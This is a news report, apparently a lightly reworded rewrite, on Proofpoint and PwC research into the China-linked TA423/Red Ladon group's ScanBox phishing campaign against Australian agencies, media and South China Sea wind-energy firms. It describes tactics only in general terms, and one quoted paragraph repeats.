In April, a China-based spy actor leveraged the ScanBox operating framework to spy on local and federal government agencies and news media companies in Australia, as well as several global corporations involved in energy projects. offshore in the South China Sea.

The latter type of casualty involved global heavy-industry manufacturers that maintain fleets of wind turbines in the South China Sea. For example, the threat group launched a phishing attack in March against a European supplier of heavy equipment used in the installation of an offshore wind farm in the Taiwan Strait called YunLin Offshore Wind Farm. The targeting of these development projects coincided with a “period of tensions between China and other countries related to development projects of high strategic importance”, researchers said.

The threat actor, known as TA423 or Red Ladon, has activity overlaps with APT40, which was highlighted by the US Department of Justice in a 2021 indictment that assessed that he provides long-term support to the Ministry of State Security of Hainan Province (MSS) and has focused on intellectual property related to naval technology developed by defense contractors funded by the federal government around the world. Since that July 2021 indictment, however, Proofpoint analysts said in new research this week that they have not observed a distinct operational tempo disruption specifically for phishing campaigns associated with TA423/Red Ladon. .

“While the indictment attributed this threat actor to a specific entity operating with the support of a Chinese state intelligence agency, the technical details included did not cover the tactics currently employed by the group in the wild” , Proofpoint’s Michael Raggi and PwC’s Sveva Scenarelli said in a joint analysis on Tuesday. “As a result, the group was free to continue using new phishing techniques like RTF Template Injection which began in early 2021 (before the indictment) and persisted until March 2022.”

“Overall, Proofpoint and PwC collectively expect TA423/Red Ladon to continue its intelligence and espionage mission primarily targeting countries in the South China Sea, as well as further intrusions into Australia, in Europe and the United States.

These attacks began with phishing emails from Gmail and Outlook email addresses, posing as an employee of a fictitious media publication called “Australian Morning News” and soliciting user feedback, or using a variety of lures, including “Sick Leave”, “User Research” and “Request for Cooperation”.

Victims who clicked on the links in the emails were redirected to a site claiming to be the Australian media publication and served by the ScanBox framework. This reconnaissance framework, which first appeared in 2014, has already been used by a number of China-based threat groups, including TA423 in 2018. The framework, which PwC assessed, is “most likely privately shared between several China-based threats. actors, allows threat actors to profile their victims (collecting information such as language, location and operating system of victims’ browsers and more, for example) and deliver other malware to victims. Although the framework was usually delivered from previously compromised websites, with the injection of malicious JavaScript code, in this attack the threat actor already had control of the malicious site. While ScanBox can deliver JavaScript code in a single block, researchers observed the framework using a more modular, plugin-based architecture in the April campaign.

“While delivering the entire code at once would allow hackers to have all the functionality of a victimized system, PwC threat intelligence analysts believe that a primary motivation for selectively loading plugins is likely a way to avoid crashes or errors that could warn owners of compromised websites,” the researchers said. “PwC believes that another likely motivation for adopting a modular architecture was to reduce visibility and researchers’ access to the threat actor’s plugins and toolset.” The group, which has been active since at least 2014, previously focused on maritime industries, naval defense contractors and associated research institutes in the United States, Western Europe and the South China Sea, often sending spear phishing emails against targets with the end goal of deploying tools like Cobalt Strike or custom Javascript malware.

“Overall, Proofpoint and PwC collectively expect TA423/Red Ladon to continue its intelligence and espionage mission primarily targeting countries in the South China Sea, as well as further intrusions into Australia, in Europe and the United States,” researchers said.